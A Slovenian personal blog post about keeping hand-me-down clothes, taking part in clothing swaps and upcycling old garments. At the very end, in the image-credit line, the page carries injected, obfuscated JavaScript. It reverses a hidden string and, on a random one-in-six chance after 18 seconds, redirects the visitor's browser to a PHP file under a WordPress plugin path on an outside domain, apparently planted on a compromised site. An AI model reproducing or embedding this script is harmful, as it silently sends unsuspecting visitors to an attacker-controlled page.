Kam s starimi oblačili

Prihajam iz družine, kjer odmetavanje starih oblačil ni prišlo v upoštev. Oblačila so šla vedno iz roke v roko, ali pa smo jih shranili za hude čase. Ne vem točno kaj naj bi te hudi časi bili, a preprosto vse smo shranjevali in tako je bilo.

Vse lepo in prav, a lahko si predstavljate koliko oblačil je to bilo. Glede na to, da se je vse skupaj dogajalo v fazi moje rasti (ki je bila sicer relativno kratka) in se je nadaljevalo v fazo odraščanja, za katero vsi vemo, kako pomembna je obleka. Poleg tega pa so tudi mamine prijateljice podobnega mišljenja, kar je pomenilo, da so tudi one kdaj prinesle kakšno stvar, ki je same ne bodo več nosile.
In tako so obleke krožile.

Seveda sem tudi sama enaka, zelo težko dejansko vržem stran kos obleke, ki bi lahko bil še uporaben. Zato so se v moji sobi zbirali vedno večji kupi, ki so čakali na svojo novo vlogo. Že takrat sta bile dve možni novi funkciji za te kose. Prvi je bil nadaljna uporaba (za mlajšo sestro), drugi pa popolna preobrazba.

Minilo je kar nekaj let, preden je dejansko prišlo do možnosti za novo uporabo, saj je sestra deset let mlajša, jaz pa takrat še nisem imela toliko znanja o prenavljanju. Mislim pa, da se je vse skupaj začelo dejansko dogajati takrat, ko smo s klubom vrhniških študentov Zakon ustvarili dogodek imenovan Dobrodelni zajtrk. Takrat sem prvič zares začutila pomembnost menjalnic oblačil.

Zdaj končno vem kaj naj naredim z vsemi temi kosi. Dejstvo je, da še vedno zelo rada prejmem rabljena oblačila. Nekaj posebnega je na njih. Resnično sem bolj vesela, ko mi kdo prinese kakšen rabljen kos oblačila, kot ko dobim novega. Ne vem, celotno dejanje mi je všeč. Zato tudi redno sodelujem na menjalnicah. Zato, ker si mislim, da bo tudi nekdo drug tako vesel kot sem jaz. Zato, ker se tako nadaljuje uporabnost oblačil, ki bi sicer samo stale v omari ali romale v smeti. In ravno zdaj se bliža nov dogodek, ki ga že komaj čakam. Nova sezona pomeni pospravljanje omare in to je zdaj veliko lažje. Shranjeanje za nadaljno uporabo ni več potrebno, saj obleke samo pospravim v ogromno vrečo, da počakajo na dan datum.

Z udejstvovanjem na menjalninci pa se je v meni prebudilo tudi znanje o recikliranju starih oblačil. Zdaj jih lahko končno uporabim tudi tako in sicer za dekoracijo, knjige iz blaga, nove kose oblačil, modne dodatke in še kaj. Tako je moja omara vedno nova in moje srce mirno.

Mislim, da je taka uporaba oblačil najbolj smiselna. Kopičenje ali metanje stran, nič od tega ni koristno. S prodajanjem “rabljenih cunj” pa se mi resnično ne da ukvarjati. Očitno ne vidim pravega smisla v tem.

Kako pa vi pospravljate omare? 🙂

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/secondhand?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash